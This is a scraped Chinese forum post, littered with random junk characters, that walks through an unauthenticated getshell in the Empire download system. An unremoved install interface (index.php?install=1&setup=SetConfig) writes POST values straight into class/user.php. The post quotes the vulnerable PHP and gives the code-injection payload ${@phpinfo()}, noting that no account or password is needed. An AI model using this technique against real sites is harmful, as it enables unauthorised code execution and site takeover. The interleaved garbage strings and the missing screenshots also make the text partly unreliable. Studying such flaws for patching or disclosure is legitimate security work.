这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
0 g3 m8 P1 l4 o* ~4 Z4 v
( M, L- e- k. E" z c/ P- @7 n6 t4 T- }9 D! y
这是帝国的一套下载系统 如图. D: }& J% G/ n3 r2 L3 C: }
ps(不需要任何账户和密码,直接写shell)
5 f8 e; D( G- ]9 T' c: x* v由于很多站是由于下载要整合discuz 等等一些论坛....
# J3 T' S" I) J3 d 4 k4 u7 r+ V' r/ x7 F$ P
而帝国他又有一个万能接口,如图
# T) q% i0 B! z* [- L( h" x; `
5 }+ m- S+ t% M, w0 k而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码3 B* a7 r+ z2 {( K4 N+ ^
" f+ b7 k" O( d6 N! V& w当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
+ K$ F* U8 [) o; F- z y% Z3 |2 y: M. i# }% Y4 O1 N4 {0 j8 y
在data/fun.php中的15行0 a2 h& w9 b# V6 e. F d
7 D) f1 B+ S( U2 Y0 x
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {: p" n& i$ r% d; h+ U
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干2 F3 j8 @ v; \7 p* _
$ U6 }+ N4 L8 T, v7 m' D, c4 a这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
% L% M; j, B g& _3 o- J9 ]- X
6 r7 e8 [! X4 K2 X# Z1 p他将传进来的变量进行了切割,然后赋给了$filetext
# X1 o5 ^* y9 K1 N% o+ @: X6 U M( V' B
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了( m1 t8 v- q* W$ J( D9 z! N( E
" t* `, ]. f8 r我们看看写入的结果,随便填一个
5 o7 r! w. \6 j& f i
% D) \# k: J7 N# d" r. r2 ]( }* g# }! [1 G
2 f- J. d) f! B" B* |. x. A
0 d3 @5 G( p; Y* W: ^( f; [
$ o2 g1 @) J0 b7 |5 y+ q3 X3 t( A% |5 {3 Y4 f _: w1 h6 v. ]
% D8 z" \9 D6 o4 p. K5 k2 Y3 r8 u+ o( O" }1 b+ }+ g5 y
0 n: v. \( u/ z2 z: T# g9 W& i: o3 L9 |' s; J( k
. A4 M+ t+ [6 X7 t
* A+ F; s% e7 u4 |4 h0 G
9 V4 a# {5 W7 U0 }, a! ]
. w) Y' g' |: p% i3 \6 ~- q# H
o' F# {1 n, X4 O
$ p' \) i1 S7 M. r/ ?! h
& K( N+ K, D7 T4 y7 |$ Z. s3 m; q+ \% }1 F4 O3 t) ~
. R0 _9 u$ e/ Q4 e3 a9 e0 ^0 Q+ w
. {6 @$ y' f! y$ d+ u" t0 U所以我们淫荡点,写个${@phpinfo()}试试
% f0 `1 H1 k2 v/ I5 @然后访问以下class/user.php这个文件, X; K. n- V: e- ^- w
日了吧 - Y3 I9 n& E" \/ w4 s# x
" S4 G5 _) N4 Y& k
0 E0 s) i3 z" |7 i) _0 X/ ?0 {) h$ i
5 a+ p3 r+ m7 W& A; k
7 D4 _5 C7 `7 @
|